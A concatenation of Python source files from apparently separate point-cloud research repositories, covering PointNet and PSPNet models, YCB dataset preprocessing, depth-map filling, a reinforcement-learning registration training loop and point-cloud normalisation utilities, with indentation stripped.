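# STN3D regresses a (c x c) transform; adding the flattened identity before the final
# reshape means an untrained network starts out close to the identity mapping (the
# standard PointNet T-Net initialization trick).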
class PointNetFeat(nn.Module):
def __init__(self, c=3, global_feat=True):
super(PointNetFeat, self).__init__()
self.global_feat = global_feat
self.stn1 = STN3D(c)
self.conv1 = nn.Conv1d(c, 64, 1)
self.conv2 = nn.Conv1d(64, 64, 1)
self.stn2 = STN3D(64)
self.conv3 = nn.Conv1d(64, 64, 1)
self.conv4 = nn.Conv1d(64, 128, 1)
self.conv5 = nn.Conv1d(128, 1024, 1)
self.mp = nn.AdaptiveMaxPool1d(1)
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(64)
self.bn3 = nn.BatchNorm1d(64)
self.bn4 = nn.BatchNorm1d(128)
self.bn5 = nn.BatchNorm1d(1024)
def forward(self, x):
stn1 = self.stn1(x)
x = torch.bmm(stn1, x)
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
stn2 = self.stn2(x)
x_tmp = torch.bmm(stn2, x)
x = F.relu(self.bn3(self.conv3(x_tmp)))
x = F.relu(self.bn4(self.conv4(x)))
x = F.relu(self.bn5(self.conv5(x)))
x = self.mp(x)
x = x.view(-1, 1024)
if not self.global_feat:
x = x.view(-1, 1024, 1).repeat(1, 1, x_tmp.size()[2])
x = torch.cat([x_tmp, x], 1)
return x
class PointNetCls(nn.Module):
def __init__(self, c=3, k=40, dropout=0.3, sync_bn=False):
super(PointNetCls, self).__init__()
self.feat = PointNetFeat(c, global_feat=True)
self.fc1 = nn.Linear(1024, 512)
self.fc2 = nn.Linear(512, 256)
self.fc3 = nn.Linear(256, k)
self.bn1 = nn.BatchNorm1d(512)
self.bn2 = nn.BatchNorm1d(256)
self.dropout = nn.Dropout(p=dropout)
def forward(self, x):
x = x.transpose(1, 2)
x = self.feat(x)
x = F.relu(self.bn1(self.fc1(x)))
x = F.relu(self.bn2(self.fc2(x)))
x = self.dropout(x)
x = self.fc3(x)
return x
# Segmentation with 9 channels input XYZ, RGB and normalized location to the room (from 0 to 1), with STN3D on input and feature
class PointNetSeg(nn.Module):
def __init__(self, c=9, k=13, sync_bn=False):
super(PointNetSeg, self).__init__()
self.feat = PointNetFeat(c, global_feat=False)
self.conv1 = nn.Conv1d(1088, 512, 1)
self.conv2 = nn.Conv1d(512, 256, 1)
self.conv3 = nn.Conv1d(256, 128, 1)
self.conv4 = nn.Conv1d(128, 128, 1)
self.conv5 = nn.Conv1d(128, k, 1)
self.bn1 = nn.BatchNorm1d(512)
self.bn2 = nn.BatchNorm1d(256)
self.bn3 = nn.BatchNorm1d(128)
self.bn4 = nn.BatchNorm1d(128)
def forward(self, x):
x = x.transpose(1, 2)
x = self.feat(x)
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
x = F.relu(self.bn3(self.conv3(x)))
x = F.relu(self.bn4(self.conv4(x)))
x = self.conv5(x)
return x
if __name__ == '__main__':
import os
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
sim_data = torch.rand(16, 2048, 3)
trans = STN3D(c=3)
out = trans(sim_data.transpose(1, 2))
print('stn', out.size())
point_feat = PointNetFeat(global_feat=True)
out = point_feat(sim_data.transpose(1, 2))
print('global feat', out.size())
point_feat = PointNetFeat(global_feat=False)
out = point_feat(sim_data.transpose(1, 2))
print('point feat', out.size())
cls = PointNetCls(c=3, k=40)
out = cls(sim_data)
print('class', out.size())
sim_data = torch.rand(16, 2048, 9)
seg = PointNetSeg(c=9, k=13)
out = seg(sim_data)
print('seg', out.size())
```
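PointNetCls above returns raw class logits (no softmax), so it pairs naturally with `nn.CrossEntropyLoss`. The snippet below is a minimal illustrative training step under that assumption; the batch size, learning rate and random tensors are placeholders, not values taken from this repository.
```python
import torch
import torch.nn as nn
import torch.optim as optim

# Assumes the PointNetCls class from the file above is in scope (same module or imported).
model = PointNetCls(c=3, k=40)
criterion = nn.CrossEntropyLoss()                    # expects raw logits
optimizer = optim.Adam(model.parameters(), lr=1e-3)  # hypothetical optimizer settings

points = torch.rand(16, 2048, 3)        # (B, N, 3) point clouds
labels = torch.randint(0, 40, (16,))    # one class index per cloud

logits = model(points)                  # (B, 40)
loss = criterion(logits, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
```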
#### File: scene_seg/util/paconv_util.py
```python
import torch
def weight_init(m):
# print(m)
if isinstance(m, torch.nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
if m.bias is not None:
torch.nn.init.constant_(m.bias, 0)
elif isinstance(m, torch.nn.Conv2d):
torch.nn.init.xavier_normal_(m.weight)
if m.bias is not None:
torch.nn.init.constant_(m.bias, 0)
elif isinstance(m, torch.nn.Conv1d):
torch.nn.init.xavier_normal_(m.weight)
if m.bias is not None:
torch.nn.init.constant_(m.bias, 0)
elif isinstance(m, torch.nn.BatchNorm2d):
torch.nn.init.constant_(m.weight, 1)
torch.nn.init.constant_(m.bias, 0)
elif isinstance(m, torch.nn.BatchNorm1d):
torch.nn.init.constant_(m.weight, 1)
torch.nn.init.constant_(m.bias, 0)
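# Illustrative usage (not part of the original file): `model.apply(weight_init)` walks
# every submodule of `model` and applies the Xavier / constant initialization above to
# its Linear, Conv1d/Conv2d and BatchNorm1d/BatchNorm2d layers.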
def get_graph_feature(x, k, idx):
batch_size = x.size(0)
num_points = x.size(2)
x = x.view(batch_size, -1, num_points)
idx_base = torch.arange(0, batch_size, device=x.device).view(-1, 1, 1) * num_points
idx = idx + idx_base
idx = idx.view(-1)
_, num_dims, _ = x.size()
x = x.transpose(2, 1).contiguous()
neighbor = x.view(batch_size * num_points, -1)[idx, :]
neighbor = neighbor.view(batch_size, num_points, k, num_dims)
x = x.view(batch_size, num_points, 1, num_dims).repeat(1, 1, k, 1)
feature = torch.cat((neighbor - x, neighbor), dim=3) # (xj-xi, xj): b,n,k,2c
return feature
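# Shape sketch for get_graph_feature: with x of shape (B, C, N) and idx of shape (B, N, k)
# holding neighbor indices, the returned tensor has shape (B, N, k, 2C); the first C
# channels are the relative offsets (xj - xi) and the last C channels the absolute
# neighbor features xj.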
def assign_score(score, point_input):
B, N, K, m = score.size()
score = score.view(B, N, K, 1, m)
point_output = torch.matmul(score, point_input).view(B, N, K, -1) # b,n,k,cout
return point_output
def get_ed(x, y):
ed = torch.norm(x - y, dim=-1).reshape(x.shape[0], 1)
return ed
def assign_kernel_withoutk(in_feat, kernel, M):
B, Cin, N0 = in_feat.size()
in_feat_trans = in_feat.permute(0, 2, 1)
out_feat_half1 = torch.matmul(in_feat_trans, kernel[:Cin]).view(B, N0, M, -1) # b,n,m,o1
out_feat_half2 = torch.matmul(in_feat_trans, kernel[Cin:]).view(B, N0, M, -1) # b,n,m,o1
if in_feat.size(1) % 2 != 0:
out_feat_half_coord = torch.matmul(in_feat_trans[:, :, :3], kernel[Cin: Cin + 3]).view(B, N0, M, -1) # b,n,m,o1
else:
out_feat_half_coord = torch.zeros_like(out_feat_half2)
return out_feat_half1 + out_feat_half2, out_feat_half1 + out_feat_half_coord
```
{
"source": "JiazeWang/PVN3D",
"score": 2
} |
#### File: datasets/ycb/preprocess_testset.py
```python
import os
import cv2
import tqdm
import torch
import os.path
import numpy as np
from common import Config
import pickle as pkl
from lib.utils.basic_utils import Basic_Utils
import scipy.io as scio
import scipy.misc
from datasets.ycb.ycb_dataset import YCB_Dataset
config = Config(dataset_name='ycb')
bs_utils = Basic_Utils(config)
torch.multiprocessing.set_sharing_strategy('file_system')
def worker_init_fn(worker_id):
np.random.seed(np.random.get_state()[1][0] + worker_id)
def main():
if os.path.exists(config.preprocessed_testset_pth):
return
test_ds = YCB_Dataset('test')
test_loader = torch.utils.data.DataLoader(
test_ds, batch_size=config.test_mini_batch_size, shuffle=False,
num_workers=40, worker_init_fn=worker_init_fn
)
data_lst = []
for i, data in tqdm.tqdm(
enumerate(test_loader), leave=False, desc='Preprocessing valtestset'
):
bs, _, _, _ = data[0].shape
for ibs in range(bs):
i_data = [item[ibs] for item in data]
if len(i_data) < 11:
print(len(i_data))
data_lst.append(i_data)
pkl.dump(data_lst, open(config.preprocessed_testset_pth, 'wb'))
if __name__ == "__main__":
main()
# vim: ts=4 sw=4 sts=4 expandtab
```
#### File: utils/ip_basic/ycb_fill_depth.py
```python
import os
import time
import cv2
import numpy as np
import pickle as pkl
import png
import nori2
from ip_basic import depth_map_utils, depth_map_utils_ycb
from ip_basic import vis_utils
import sys
sys.path.append('..')
from lib.utils.my_utils import my_utils
from neupeak.utils.webcv2 import imshow, waitKey
from tqdm import tqdm
import concurrent.futures
nf = nori2.Fetcher()
def show_depth(name, dpt):
dpt = (dpt / np.max(dpt) * 255).astype(np.uint8)
imshow(name, dpt)
def get_one_show(nid):
fill_type = 'multiscale'
# fill_type = 'fast'
show_process = False
extrapolate = True  # False
# blur_type = 'gaussian'
blur_type = 'bilateral'
data = pkl.loads(nf.get(nid))
bk_label = data['label']
bk_label = bk_label <= 0
bk_label_3c = np.repeat(bk_label[:, :, None], 3, 2)
rgb_back = data['rgb'][:, :, :3] * bk_label_3c
dpt_back = data['depth'].astype(np.float32) # * bk_label.astype(np.float32)
cam_scale = data['meta']['factor_depth'].astype(np.float32)[0][0]
scale_2_80 = 1  # 80 / 4.6 for "test", 80 / 6.6 for "train_real"
dpt_back = dpt_back / cam_scale * scale_2_80
pcld, choose = my_utils.dpt_2_cld(
data['depth'], cam_scale, data['obj_info_lst'][0]['K']
)
nrm = my_utils.get_normal(pcld)
nrm_map = my_utils.get_normal_map(nrm, choose)
print('dpt range(min, max): ', np.min(dpt_back), np.max(dpt_back), cam_scale)
projected_depth = dpt_back.copy()
start_fill_time = time.time()
if fill_type == 'fast':
final_dpt = depth_map_utils_ycb.fill_in_fast(
projected_depth, extrapolate=extrapolate, blur_type=blur_type,
# max_depth=120.0
)
elif fill_type == 'multiscale':
final_dpt, process_dict = depth_map_utils_ycb.fill_in_multiscale(
projected_depth, extrapolate=extrapolate, blur_type=blur_type,
show_process=show_process,
# max_depth=120.0
)
else:
raise ValueError('Invalid fill_type {}'.format(fill_type))
end_fill_time = time.time()
pcld, choose = my_utils.dpt_2_cld(
final_dpt, scale_2_80, data['obj_info_lst'][0]['K']
)
nrm = my_utils.get_normal(pcld)
nrm_map_final = my_utils.get_normal_map(nrm, choose)
show_dict = dict(
ori_dpt = dpt_back,
final_dpt = final_dpt,
rgb = data['rgb'][:, :, :3][...,::-1].astype(np.uint8),
nrm_map = nrm_map,
nrm_map_final = nrm_map_final,
)
return show_dict
def complete_dpt(nid_p):
nid_lst = my_utils.read_lines(nid_p)
# fill_type = 'fast'
cnt = 0
import random
# random.shuffle(nid_lst)
with concurrent.futures.ProcessPoolExecutor(15) as executor:
for info in executor.map(get_one_show, nid_lst):
print(np.min(info['final_dpt']), np.max(info['final_dpt']))
show_depth('ori_dpth', info['ori_dpt'])
show_depth('cmplt_dpth', info['final_dpt'])
imshow('rgb', info['rgb'])
imshow('nrm_map', info['nrm_map'])
imshow('nrm_map_final', info['nrm_map_final'])
if cnt == 0:
cmd = waitKey(0)
# cnt += 1
else:
cmd = waitKey(2)
def get_one_depth(nid):
data = pkl.loads(nf.get(nid))
dpt_back = data['depth'].astype(np.float32) # * bk_label.astype(np.float32)
cam_scale = data['meta']['factor_depth'].astype(np.float32)[0][0]
# K = data['obj_info_lst'][0]['K']
# print(K)
dpt_back = dpt_back / cam_scale
dpt_back = dpt_back.reshape(-1)
max_dpt = dpt_back[np.argpartition(dpt_back, -100)[-100:]]
return np.mean(max_dpt)
def get_depth_max_statics(nid_p):
print(nid_p)
nid_lst = my_utils.read_lines(nid_p)
# nid_lst = nid_lst[:2] + nid_lst[-2:]
max_dp = 0.0
with concurrent.futures.ProcessPoolExecutor(15) as executor:
for dpt in tqdm(executor.map(get_one_depth, nid_lst)):
if dpt > max_dp:
max_dp = dpt
print("max_dp: ", max_dp)
def main():
nid_lst_p_lst = [
'/data/ycb_linemod_datasets/ycb/pose_nori_lists/allobj_test_real.nori.list',
'/data/ycb_linemod_datasets/ycb/pose_nori_lists/allobj_train_real.nori.list',
'/data/ycb_linemod_datasets/ycb/pose_nori_lists/allobj_train_syn.nori.list',
# '/data/ycb_linemod_datasets/ycb/ycb_train_rdlm.nori.list',
# '/data/ycb_linemod_datasets/ycb/ycb_train_syn_rdlm.nori.list',
# '/data/ycb_linemod_datasets/ycb/ycb_train_real_rdlm.nori.list',
# '/data/ycb_linemod_datasets/ycb/ycb_test_rdlm.nori.list'
]
complete_dpt(nid_lst_p_lst[0])
for nid_lst_p in nid_lst_p_lst:
get_depth_max_statics(nid_lst_p)
if __name__ == "__main__":
main()
# vim: ts=4 sw=4 sts=4 expandtab
```
{
"source": "JiazeWang/reagent",
"score": 3
} |
#### File: reagent/registration_dense/pspnet.py
```python
import math
import torch
from torch import nn
from torch.nn import functional as F
def conv3x3(in_planes, out_planes, stride=1, dilation=1):
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=dilation, dilation=dilation, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride=stride, dilation=dilation)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes, stride=1, dilation=dilation)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.relu(out)
out = self.conv2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers=(3, 4, 23, 3)):
self.inplanes = 64
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=False)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=1, dilation=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=1, dilation=4)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2./n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1, dilation=1):
downsample = None
if stride != 1 or self.inplanes != planes*block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes*block.expansion, kernel_size=1, stride=stride, bias=False)
)
layers = [block(self.inplanes, planes, stride, downsample)]
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, dilation=dilation))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
return x
class PSPModule(nn.Module):
def __init__(self, feat_dim, bins=(1, 2, 3, 6)):
super(PSPModule, self).__init__()
self.reduction_dim = feat_dim // len(bins)
self.stages = []
self.stages = nn.ModuleList([self._make_stage(feat_dim, size) for size in bins])
def _make_stage(self, feat_dim, size):
prior = nn.AdaptiveAvgPool2d(output_size=(size, size))
conv = nn.Conv2d(feat_dim, self.reduction_dim, kernel_size=1, bias=False)
relu = nn.ReLU(inplace=True)
return nn.Sequential(prior, conv, relu)
def forward(self, feats):
h, w = feats.size(2), feats.size(3)
priors = [feats]
for stage in self.stages:
priors.append(F.interpolate(input=stage(feats), size=(h, w), mode='bilinear', align_corners=True))
return torch.cat(priors, 1)
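# With the defaults used below (feat_dim=512 from the ResNet-18 backbone, bins=(1, 2, 3, 6)),
# each pyramid stage outputs 512 // 4 = 128 channels, so the concatenation above yields
# 512 + 4 * 128 = 1024 channels -- exactly what PSPNet's up_1 expects.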
class PSPUpsample(nn.Module):
def __init__(self, in_channels, out_channels):
super(PSPUpsample, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_channels, out_channels, 3, padding=1),
nn.PReLU()
)
def forward(self, x):
x = F.interpolate(x, scale_factor=2, mode='bilinear', align_corners=True)
return self.conv(x)
class PSPNet(nn.Module):
def __init__(self, bins=(1, 2, 3, 6), backend='resnet18'):
super(PSPNet, self).__init__()
if backend == 'resnet18':
self.feats = ResNet(BasicBlock, [2, 2, 2, 2])
feat_dim = 512
else:
raise NotImplementedError
self.psp = PSPModule(feat_dim, bins)
self.drop = nn.Dropout2d(p=0.15)
self.up_1 = PSPUpsample(1024, 256)
self.up_2 = PSPUpsample(256, 64)
self.up_3 = PSPUpsample(64, 64)
self.final = nn.Conv2d(64, 32, kernel_size=1)
def forward(self, x):
f = self.feats(x)
p = self.psp(f)
#print("psp:", p.shape)
#psp: torch.Size([32, 1024, 24, 24])
p = self.up_1(p)
#up1: torch.Size([32, 256, 48, 48])
#print("up1:", p.shape)
p = self.drop(p)
p = self.up_2(p)
#print("up2:", p.shape)
#up2: torch.Size([32, 64, 96, 96])
p = self.drop(p)
p = self.up_3(p)
#print("up3:", p.shape)
#up3: torch.Size([32, 64, 192, 192])
return self.final(p)
```
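The commented shapes inside PSPNet.forward correspond to a single-channel 192x192 input (conv1 and the max-pool each halve the resolution, layer2 halves it again, and the three PSPUpsample stages bring it back to the input size). A quick shape check, assuming the PSPNet class above is in scope, would look like:
```python
import torch

net = PSPNet(backend='resnet18')
x = torch.randn(2, 1, 192, 192)   # (B, 1, H, W) depth-image-like input
y = net(x)
print(y.shape)                    # expected: torch.Size([2, 32, 192, 192])
```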
#### File: reagent/registration/train_pn_2D_mgpus_e50.py
```python
import numpy as np
np.random.seed(42)
import torch
torch.manual_seed(42)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
torch.set_default_dtype(torch.float32)
import torch.nn.functional as F
import torch.nn as nn
import os
from tqdm import tqdm
from prefetch_generator import BackgroundGenerator
import argparse
import sys
sys.path.append(os.path.dirname(os.path.abspath(__file__)).replace("/registration", ""))
from environment import environment as env
from environment import transformations as tra
from environment.buffer import Buffer
from registration.model_pn_2D import Agent
import registration.model_pn_2D as util_model
import utility.metrics as metrics
from utility.logger import Logger
from dataset.dataset import DatasetModelnet40, DatasetLinemod
import config as cfg
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def train(agent, logger, dataset, noise_type, epochs, lr, lr_step, alpha, model_path, reward_mode=""):
optimizer = torch.optim.Adam(agent.parameters(), lr=lr, amsgrad=True)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, lr_step, 0.5)
Dataset = DatasetModelnet40 if dataset == "m40" else DatasetLinemod
train_dataset = Dataset("train", noise_type)
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=cfg.BATCH_SIZE, shuffle=True)
val_dataset = Dataset("val", noise_type)
val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=cfg.BATCH_SIZE, shuffle=False)
test_dataset = Dataset("test" if dataset == "m40" else "eval", noise_type)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=cfg.BATCH_SIZE, shuffle=False)
RANDOM_STATE = np.random.get_state() # otherwise loader produces deterministic samples after iter 1
losses_bc, losses_ppo, train_rewards, final_rewards = [], [], [], []
episode = 0 # for loss logging (not using epoch)
best_chamfer = np.infty
buffer = Buffer()
buffer.start_trajectory()
for epoch in range(epochs):
print(f"Epoch {epoch}")
# -- train
agent.train()
np.random.set_state(RANDOM_STATE)
progress = tqdm(BackgroundGenerator(train_loader), total=len(train_loader))
for data in progress:
with torch.no_grad():
# per sample, generate a full trajectory
source, target, pose_source, pose_target = env.init(data)
if cfg.DISENTANGLED:
pose_target = tra.to_disentangled(pose_target, source)
current_source = source
if reward_mode == "goal":
reward = env.reward_goal(pose_source, pose_target)
elif reward_mode == "step":
gt_pcd_source = tra.apply_trafo(current_source, pose_target, disentangled=cfg.DISENTANGLED)
_, prev_chamfer = env.reward_step(current_source, gt_pcd_source)
# STAGE 1: generate trajectories
for step in range(cfg.ITER_TRAIN):
# expert prediction
expert_action = env.expert(pose_source, pose_target, mode=cfg.EXPERT_MODE)
# student prediction -- stochastic policy
state_emb, action_logit, state_value, _ = agent(current_source, target)
action = util_model.action_from_logits(action_logit, deterministic=False)
action_logprob, action_entropy = util_model.action_stats(action_logit, action)
# step environment and get reward
new_source, pose_source = env.step(source, action, pose_source, cfg.DISENTANGLED)
if reward_mode == "goal":
reward = env.reward_goal(pose_source, pose_target)
elif reward_mode == "step":
reward, prev_chamfer = env.reward_step(new_source, gt_pcd_source, prev_chamfer)
else:
reward = torch.zeros((pose_source.shape[0], 1, 1)).to(DEVICE)
# log trajectory
buffer.log_step([current_source, target], state_value, reward,
expert_action,
action, action_logit, action_logprob)
current_source = new_source
train_rewards.append(reward.view(-1))
final_rewards.append(reward.view(-1))
if len(buffer) == cfg.NUM_TRAJ:
# STAGE 2: policy (and value estimator) update using BC (and PPO)
# convert buffer to tensor of samples (also computes return and advantage over trajectories)
samples = buffer.get_samples()
ppo_dataset = torch.utils.data.TensorDataset(*samples)
ppo_loader = torch.utils.data.DataLoader(ppo_dataset, batch_size=cfg.BATCH_SIZE, shuffle=True,
drop_last=False)
# sample batches from buffer and update
for batch in ppo_loader:
sources, targets, \
expert_actions, state_values, \
actions, action_logits, action_logprobs, \
returns, advantages = batch
# -- predict using current policy
new_state_emb, new_action_logit, new_values, _ = agent(sources, targets)
new_action_logprob, new_action_entropy = util_model.action_stats(new_action_logit, actions)
# -- clone term
loss_translation = F.cross_entropy(new_action_logit[0].view(-1, 11, 1, 1, 1),
expert_actions[:, 0].reshape(-1, 1, 1, 1))
loss_rotation = F.cross_entropy(new_action_logit[1].view(-1, 11, 1, 1, 1),
expert_actions[:, 1].reshape(-1, 1, 1, 1))
clone_loss = (loss_translation + loss_rotation) / 2
if alpha > 0:
# -- policy term
# ratio: lp > prev_lp --> probability of selecting that action increased
ratio = torch.exp(new_action_logprob - action_logprobs).reshape(-1, 6)
policy_loss = -torch.min(ratio * advantages.repeat(1, 6),
ratio.clamp(1 - cfg.CLIP_EPS,
1 + cfg.CLIP_EPS) * advantages.repeat(1, 6)).mean()
# -- value term
value_loss = (new_values.view(-1, 1) - returns).pow(2)
if cfg.CLIP_VALUE:
values_clipped = state_values + (new_values - state_values)\
.clamp(-cfg.CLIP_EPS, cfg.CLIP_EPS)
losses_v_clipped = (values_clipped.view(-1, 1) - returns).pow(2)
value_loss = torch.max(value_loss, losses_v_clipped)
value_loss = value_loss.mean()
# -- entropy term
entropy_loss = new_action_entropy.mean()
# -- update
optimizer.zero_grad()
loss = clone_loss
losses_bc.append(clone_loss.item())
if alpha > 0:
ppo_loss = policy_loss + value_loss * cfg.C_VALUE - entropy_loss * cfg.C_ENTROPY
loss += ppo_loss * alpha
losses_ppo.append(ppo_loss.item())
loss.backward()
optimizer.step()
# logging
if alpha > 0:
logger.record("train/ppo", np.mean(losses_ppo))
logger.record("train/bc", np.mean(losses_bc))
logger.record("train/reward", float(torch.cat(train_rewards, dim=0).mean()))
logger.record("train/final_reward", float(torch.cat(final_rewards, dim=0).mean()))
logger.dump(step=episode)
# reset
losses_bc, losses_ppo, train_rewards, final_rewards = [], [], [], []
buffer.clear()
episode += 1
buffer.start_trajectory()
scheduler.step()
RANDOM_STATE = np.random.get_state() # evaluation sets seeds again -- keep random state of the training stage
# -- test
if val_loader is not None:
chamfer_val = evaluate(agent, logger, val_loader, prefix='val')
if test_loader is not None:
chamfer_test = evaluate(agent, logger, test_loader)
if chamfer_test <= best_chamfer:
print(f"new best: {chamfer_test}")
best_chamfer = chamfer_test
infos = {
'epoch': epoch,
'optimizer_state_dict': optimizer.state_dict()
}
util_model.save(agent, f"{model_path}_mgpu_shared_p50.zip", infos)
model_epoch_path = os.path.join(code_path, f"weights/p50_shared_mgpus_pn_2d_{dataset}_{mode}_{str(epoch)}")
util_model.save(agent, f"{model_epoch_path}.zip", infos)
logger.dump(step=epoch)
def evaluate(agent, logger, loader, prefix='test'):
agent.eval()
progress = tqdm(BackgroundGenerator(loader), total=len(loader))
predictions = []
val_losses = []
with torch.no_grad():
for data in progress:
source, target, pose_source, pose_target = env.init(data)
if cfg.DISENTANGLED:
pose_target = tra.to_disentangled(pose_target, source)
current_source = source
for step in range(cfg.ITER_EVAL):
expert_action = env.expert(pose_source, pose_target, mode=cfg.EXPERT_MODE)
state_emb, action_logit, _, _ = agent(current_source, target)
action = util_model.action_from_logits(action_logit, deterministic=True)
loss_translation = F.cross_entropy(action_logit[0].view(-1, 11, 1, 1, 1),
expert_action[:, 0].reshape(-1, 1, 1, 1))
loss_rotation = F.cross_entropy(action_logit[1].view(-1, 11, 1, 1, 1),
expert_action[:, 1].reshape(-1, 1, 1, 1))
val_losses.append((loss_translation + loss_rotation).item()/2)
current_source, pose_source = env.step(source, action, pose_source, cfg.DISENTANGLED)
if cfg.DISENTANGLED:
pose_source = tra.to_global(pose_source, source)
predictions.append(pose_source)
predictions = torch.cat(predictions)
_, summary_metrics = metrics.compute_stats(predictions, data_loader=loader)
# log test metrics
if isinstance(loader.dataset, DatasetLinemod):
logger.record(f"{prefix}/add", summary_metrics['add'])
logger.record(f"{prefix}/adi", summary_metrics['adi'])
return summary_metrics['add']
else:
logger.record(f"{prefix}/mae-r", summary_metrics['r_mae'])
logger.record(f"{prefix}/mae-t", summary_metrics['t_mae'])
logger.record(f"{prefix}/iso-r", summary_metrics['r_iso'])
logger.record(f"{prefix}/iso-t", summary_metrics['t_iso'])
logger.record(f"{prefix}/chamfer", summary_metrics['chamfer_dist'])
logger.record(f"{prefix}/adi-auc", summary_metrics['adi_auc10'] * 100)
return summary_metrics['chamfer_dist']
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='ReAgent - training on ModelNet40 and LINEMOD')
parser.add_argument('--mode', type=str, default='il', choices=['pretrain', 'il', 'ilrl'],
help='pretraining (pretrain), IL-only (il), IL+RL with a step-wise reward (ilrl).')
parser.add_argument('--dataset', type=str, default='m40', choices=['m40', 'lm'],
help='Dataset used for training. All experiments on ModelNet40 and ScanObjectNN use the same '
'weights - train both with "m40". Experiments on LINEMOD ("lm") use no pretraining.')
args = parser.parse_args()
# PATHS
dataset = args.dataset
mode = args.mode
code_path = os.path.dirname(os.path.abspath(__file__)).replace("/registration", "")
if not os.path.exists(os.path.join(code_path, "logs")):
os.mkdir(os.path.join(code_path, "logs"))
if not os.path.exists(os.path.join(code_path, "weights")):
os.mkdir(os.path.join(code_path, "weights"))
model_path = os.path.join(code_path, f"weights/{dataset}_{mode}")
logger = Logger(log_dir=os.path.join(code_path, f"logs/{dataset}/"), log_name=f"pre50_shared_mGPUs_2D_pn_{mode}",
reset_num_timesteps=True)
if torch.cuda.device_count() > 1:
print("Using multiple GPUs")
else:
print("Using single GPU")
# TRAINING
agent = nn.DataParallel(Agent()).to(DEVICE)
if args.mode == "pretrain" and dataset == "m40":
print(f"Training: dataset '{dataset}' - mode '{args.mode}'")
train(agent, logger, dataset, noise_type="clean", epochs=50, lr=1e-3, lr_step=20, alpha=0,
model_path=model_path)
else:
if args.mode == "il":
alpha = 0.0
reward_mode = ""
elif args.mode == "ilrl":
alpha = 2.0 if dataset == "m40" else 0.1 # reduced influence on lm
reward_mode = "step"
else:
raise ValueError("No pretraining on LINEMOD. Use 'il' or 'ilrl' instead.")
print(f"Training: dataset '{dataset}' - mode '{args.mode}'{f' - alpha={alpha}' if args.mode != 'il' else ''}")
if dataset == "m40":
print(" loading pretrained weights...")
if os.path.exists(os.path.join(code_path, f"weights/m40_pretrain_mgpu_shared.zip")):
util_model.load(agent, os.path.join(code_path, f"weights/m40_pretrain_mgpu_shared.zip"))
else:
raise FileNotFoundError(f"No pretrained weights found at "
f"{os.path.join(code_path, 'weights/m40_pretrain_mgpu_shared.zip')}. Run with "
f"'pretrain' first or download the provided weights.")
noise_type = "jitter" if dataset == "m40" else "segmentation"
epochs = 100 if dataset == "m40" else 200
lr = 1e-4 if dataset == "m40" else 1e-3
lr_step = 20 if dataset == "m40" else 40
train(agent, logger, dataset, noise_type, epochs=epochs, lr=lr, lr_step=lr_step,
alpha=alpha, reward_mode=reward_mode, model_path=model_path)
```
{
"source": "JiazeWang/SP-GAN",
"score": 2
} |
#### File: SP-GAN/Common/point_operation.py
```python
import numpy as np
def nonuniform_sampling(num = 4096, sample_num = 1024):
sample = set()
loc = np.random.rand()*0.8+0.1
while(len(sample)<sample_num):
a = int(np.random.normal(loc=loc,scale=0.3)*num)
if a<0 or a>=num:
continue
sample.add(a)
return list(sample)
def normalize_point_cloud(inputs):
"""
input: pc [N, P, 3]
output: normalized pc of the same shape (each cloud centred on its centroid and scaled to unit furthest distance)
"""
#print("shape",input.shape)
C = inputs.shape[-1]
pc = inputs[:,:,:3]
if C > 3:
nor = inputs[:,:,3:]
centroid = np.mean(pc, axis=1, keepdims=True)
pc = inputs[:,:,:3] - centroid
furthest_distance = np.amax(
np.sqrt(np.sum(pc ** 2, axis=-1, keepdims=True)), axis=1, keepdims=True)
pc = pc / furthest_distance
if C > 3:
return np.concatenate([pc,nor],axis=-1)
else:
return pc
def shuffle_point_cloud_and_gt(batch_data,batch_gt=None):
B,N,C = batch_data.shape
idx = np.arange(N)
np.random.shuffle(idx)
batch_data = batch_data[:,idx,:]
if batch_gt is not None:
np.random.shuffle(idx)
batch_gt = batch_gt[:,idx,:]
return batch_data,batch_gt
def shuffle_data(data, labels):
""" Shuffle data and labels.
Input:
data: B,N,... numpy array
label: B,... numpy array
Return:
shuffled data, label and shuffle indices
"""
idx = np.arange(len(labels))
np.random.shuffle(idx)
return data[idx, ...], labels[idx]
